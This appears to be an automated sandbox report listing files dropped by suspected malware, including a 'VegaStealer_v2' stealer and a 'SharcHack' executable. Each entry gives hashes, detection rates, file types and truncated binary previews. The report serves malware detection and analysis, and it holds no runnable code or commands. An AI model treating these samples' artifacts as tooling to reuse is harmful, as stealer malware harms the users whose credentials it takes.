                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... .c...........!..................... ........... .......................@......<.....@.................................l...O........................T... ......4................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H......../..................n...P .........................................pf.P.Y@.....D.8.Y..s.1.z#..../.....`.ZpW..45....F..W.K.(......... r24..6.5...*..\......*.5.9_e.eX..X......6.m.rp.M.'...(....*.0..3.......~.....(...., r...p.....(....o....s...........~....*.~....*.......*V(....r=..p~....o....*V(....ri..p~....o....*...0..6.......~....s.........o.........r...ps......r...po....&.o ...o!....o"....o#...&...r...po....&.o$...o%.....+D..o&...t......,...+..r...po....&.o'
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):208568
                                                                                                                                                                                                                                    Entropy (8bit):6.1218954888666905
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:7yuS8cGzz6KP8cp1x+PAaDOEzxOkqabge94h0Ero7v6PxlcU7vtPCjRTZPxB:7PX6KP8cp1kYcOnnaZ9W3roLGxPL2Xx
                                                                                                                                                                                                                                    MD5:355BBEA5EE15D806E0D6BD6DBD25F494
                                                                                                                                                                                                                                    SHA1:B41EBF0FF5C4EFFA1FD123845EFE03764E91341E
                                                                                                                                                                                                                                    SHA-256:8E2AE9D4A03E95C714D7835310795B7E0434B8AA3448E6A5B106AD9DBBA0158F
                                                                                                                                                                                                                                    SHA-512:AD453A26A22EFB522126208A1E7EBEE6EC429FDE52F4A3D30212EF9F58E39714FD7F42D05031BF31992199AEA573F9F1887DC83ED30093527D3E8B33476A4387
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....c...........!................>.... ........... .......................@......C8....@.....................................W........................T... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................ .......H......../..................n...P ......................................[...HD..0iU.....h..Y#...D.m..Ze...W.fj....~..9>..u.Q=...5P.9sw....~...Cg......c..X.....~..}....:@Gk...M..i,...`R....Z[-q.}.M..(....*.0..3.......~.....(...., r...p.....(....o....s...........~....*.~....*.......*V(....r=..p~....o....*V(....ri..p~....o....*...0..6.......~....s.........o.........r...ps......r...po....&.o ...o!....o"....o#...&...r...po....&.o$...o%.....+D..o&...t......,...+..r...po....&.o'
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):420528
                                                                                                                                                                                                                                    Entropy (8bit):6.162571798892841
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:OPaYZ6henFNFfcaFeFOFwcGF6cmFWc0FWc8cIcKcUFJFpcNcHc7cbchFFc5cbc1v:g6hetBJm333M8EGAB
                                                                                                                                                                                                                                    MD5:056D3FCAF3B1D32FF25F513621E2A372
                                                                                                                                                                                                                                    SHA1:851740BCA46BAB71D0B1D47E47F3EB8358CBEE03
                                                                                                                                                                                                                                    SHA-256:66B64362664030BFF1596CDA2EC5BD5DF48CC7C8313C32F771DB4AA30A3F86F9
                                                                                                                                                                                                                                    SHA-512:CE47C581538F48A46D70279A62C702195BEACBFAFB48A5A862B3922625FE56F6887D1679C6D9366F946D3D2124CB31C2A3EACBBD14D601EA56E66575CDF46180
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....c...........!.................+... ...@....... ...................................@.................................d+..W....@..p................T...`......,*............................................... ............... ..H............text........ ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B.................+......H............M..........PM..J...P .......................................e...y....M.Yh~..P*b...q.q...+t.T.d.........v..Fq...:....unR.a5..Y.>...d.:.....Kuq.U9...d...K..d....K..E.$uh...a....1...w.:.(......}....*..{....*:.(......}....*..{....*r.(......}......}......}....*..0..5........-..*~.....o.....X...v....~.......o......o .........*6..(....(....*"..(....*.0..T........~!...("...-..-.~#...*../....+...X....($...-..-.~#...*..v........(%...~.......o&...*Z.~....2..~.........
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\SharcHack.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):8068096
                                                                                                                                                                                                                                    Entropy (8bit):7.905088140781816
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:98304:Rgl47z3Aldea5a/OhtJeq+4NK+dG7M0mWZsE6+YhU+dbkh4yiMP0Q:H/wld79ht+j1M0mWZsE6+YASy10Q
                                                                                                                                                                                                                                    MD5:9F4F298BCF1D208BD3CE3907CFB28480
                                                                                                                                                                                                                                    SHA1:05C1CFDE951306F8C6E9D484D3D88698C4419C62
                                                                                                                                                                                                                                    SHA-256:BF7057293D871CAC087DAAB42DAF22C1737A1DF6ADC7B7963989658F3B65F4CC
                                                                                                                                                                                                                                    SHA-512:4C763C3B6D4884F77083DB5CCADA59BC57803B3226294EFF2EC3DB8F2121AC01EE240B0E822CB090F5320CE40DF545B477E323EFABDBCA31722731ADC4B46806
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q......................{.............. ....@...........................|.............................................. ..P.......d.z.......................................................................... ...............................text...&........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...d.z.......z.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):98304
                                                                                                                                                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):27406384
                                                                                                                                                                                                                                    Entropy (8bit):7.993410954401878
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:786432:37YPcmlabhBx9CrdUxTvngF7oUNUQWQu7pquEKLR:rGTabv+CVYhoLXQ8BR
                                                                                                                                                                                                                                    MD5:E0F666FE4FF537FB8587CCD215E41E5F
                                                                                                                                                                                                                                    SHA1:D283F9B56C1E36B70A74772F7CA927708D1BE76F
                                                                                                                                                                                                                                    SHA-256:F88B0E5A32A395AB9996452D461820679E55C19952EFFE991DEE8FEDEA1968AF
                                                                                                                                                                                                                                    SHA-512:7F6CABD79CA7CDACC20BE8F3324BA1FDAAFF57CB9933693253E595BFC5AF2CB7510AA00522A466666993DA26DDC7DF4096850A310D7CFF44B2807DE4E1179D1A
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...oGXb.................R...^.......^.......p....@.................................".....@......@...................@....... .......p..................k...................................`......................."..T....0.......................text....9.......:.................. ..`.itext.......P.......>.............. ..`.data....7...p...8...V..............@....bss.....m...............................idata....... ......................@....didata......0......................@....edata.......@......................@..@.tls.........P...........................rdata..]....`......................@..@.rsrc........p......................@..@....................................@..@........................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    File Type:PNG image data, 700 x 360, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):75974
                                                                                                                                                                                                                                    Entropy (8bit):7.973739579566582
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:cyfQCzB7fBVwtW5EGtWO7Cemktbbv36SEOW9izF:cyfJ/2WXz7Fbbf61OW9aF
                                                                                                                                                                                                                                    MD5:CD09F361286D1AD2622BA8A57B7613BD
                                                                                                                                                                                                                                    SHA1:4CD3E5D4063B3517A950B9D030841F51F3C5F1B1
                                                                                                                                                                                                                                    SHA-256:B92A31D4853D1B2C4E5B9D9624F40B439856D0C6A517E100978CBDE8D3C47DC8
                                                                                                                                                                                                                                    SHA-512:F73D60C92644E0478107E0402D1C7B4DFA1674F69B41856F74F937A7B57CEAA2B3BE9242F2B59F1FCF71063AAC6CBE16C594618D1A8CDD181510DE3240F31DFF
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......h.......(.....pHYs.................sRGB.........gAMA......a...([IDATx.....U./.?...0'.H.%.A$.N....t.+. .1....].8..8...q...D.OQ.t>G...}Z.x.t.(.....#..........vF0'<;!..;.k..].T....t...._U...k.........................................................................................................................................................................[.````````p.c..v*..jii.,.Z.+...B.tySSSc......3.&..........G$J.....:X2v3....mkk.P... ..K.n.X,R.......n.............j.g..].v..>...P}..Mo.z........Am`c.4.h.`..E.F.f..-........G..6............$..=p......Floh.................Fc..mP..R.........50000008".7.)S2.6=..c+P....K.].]=. ..]..{.........$L...IM+. ...!.?.q.g....4..............SZ".Xe..G.-]#..7.!.)]t|VW..-]...}.KW.t..8.."...-.."..`...u.0...uI...q(.N.?.0.J.p..m$/S.H..D.cJx. hU.]q.j...t...T.m......A...Y....r.........0.f....UD.J.V.g0.y/|C.4l!..jix.{V...o.. ..V...9K..7:..D...u....e.|.-.J.Z../. . .. !.:.,...u...50000008R`...W.c.2.(..
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    File Type:PNG image data, 700 x 360, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):30586
                                                                                                                                                                                                                                    Entropy (8bit):7.919646221064304
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:Fk7fJC9WjOI1DaGmnitN039DODp56Ys+9S/IUM+:FktpB4FiQ3qd9S/BN
                                                                                                                                                                                                                                    MD5:9AC6287111CB2B272561781786C46CDD
                                                                                                                                                                                                                                    SHA1:6B02F2307EC17D9325523AF1D27A6CB386C8F543
                                                                                                                                                                                                                                    SHA-256:AB99CDB7D798CB7B7D8517584D546AA4ED54ECA1B808DE6D076710C8A400C8C4
                                                                                                                                                                                                                                    SHA-512:F998A4E0CE14B3898A72E0B8A3F7154FC87D2070BADCFA98582E3B570CA83A562D5A0C95F999A4B396619DB42AB6269A2BAC47702597C5A2C37177441723D837
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......h.......(.....pHYs.................sRGB.........gAMA......a...w.IDATx....]Wu.5....$...U....!...t.H"...#9.yI'...30H........$'a6...D..NwB...4.tB.$...'......0.d.z}W.+/-.3.[u.=....S..{X{.i.}....B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!D.1#.I....C.g.~.....1...3_r....OB.!..bJ...2k......;..~....q`.f..ov.B.!...!.w.....<..S..w.}?f.^|..w.s.=o.i..M.!...&2.&...~..mt.a;`.>h.....o.}........n.u..?...B.!D-d.N2../...3g..5k.o...<.....s..7C.I....3f._I.!..B.B....n.i.......f...[..}.........;b...........k.Gg.{.....v...fa...^x_.B.!......dFFF0:....Uf.>...,<{..6..C........g.s.=.f.....;<<|8.!..B.Z...$..../8~....h]o...8.Q./.../..?OB.!...cd.N....^j...;........N.....|......B..`.....W...........*..1..#....C........ ..C...X.|.U.....^...;.x...w../..;6.a....W-Z..$..B4.3t.mpg{{..6;.[.z.8...t..!3t....<Xg.....p....F.o.|.+_y.y.>k..........=.IO.&....Y..a.c.*...k...[....{$.!....
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    File Type:PNG image data, 700 x 360, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):48743
                                                                                                                                                                                                                                    Entropy (8bit):7.952703392311964
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:RtwR1Dy4rQznr1GYfvLn6froelhVNSyCPtSOeVlTTqYueg:zwR1DybhPwhvSyClSOk/geg
                                                                                                                                                                                                                                    MD5:4CFFF8DC30D353CD3D215FD3A5DBAC24
                                                                                                                                                                                                                                    SHA1:0F4F73F0DDDC75F3506E026EF53C45C6FAFBC87E
                                                                                                                                                                                                                                    SHA-256:0C430E56D69435D8AB31CBB5916A73A47D11EF65B37D289EE7D11130ADF25856
                                                                                                                                                                                                                                    SHA-512:9D616F19C2496BE6E89B855C41BEFC0235E3CE949D2B2AE7719C823F10BE7FE0809BDDFD93E28735B36271083DD802AE349B3AB7B60179B269D4A18C6CEF4139
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......h.......(.....pHYs.................sRGB.........gAMA......a.....IDATx...eIu....(..Y31.}q....`...t....Z..8t;x3._@.3.0.{.E.".&.5.g.C..@..%.>r.5....B...O...^.*..s....{.7..{....r..+W...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(.n+.t.B.p.x.....^.?/....p,..7...{.P(...B.H...r.y..|.....{l\tO.|..<..P(....w......o..P(.<h...n[\tO..?......E...}...F.P83....<z.....W..7...w.....?..?.YW(.N.......?N[..E..A..z..[...'.$..'....8...?~.K.|........[#.....6........;.......s.=...}.c...{.._..z....;w..........(../..n...?..??..?.........z.......~....[o.<.......x.).Z.(..s.N..Wb.....f....../.P8.|.......?..#......2vO....F......@.|..w7].|..$..}?.L.Go...A.1..^...j...$.6....~..x...{..IwD`|..?.....?...{..~~........).........`$.......tG....|.n.2..........[..._....e.}.=..<........h.7|?Kg....+
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):6144
                                                                                                                                                                                                                                    Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                                                    MD5:E4211D6D009757C078A9FAC7FF4F03D4
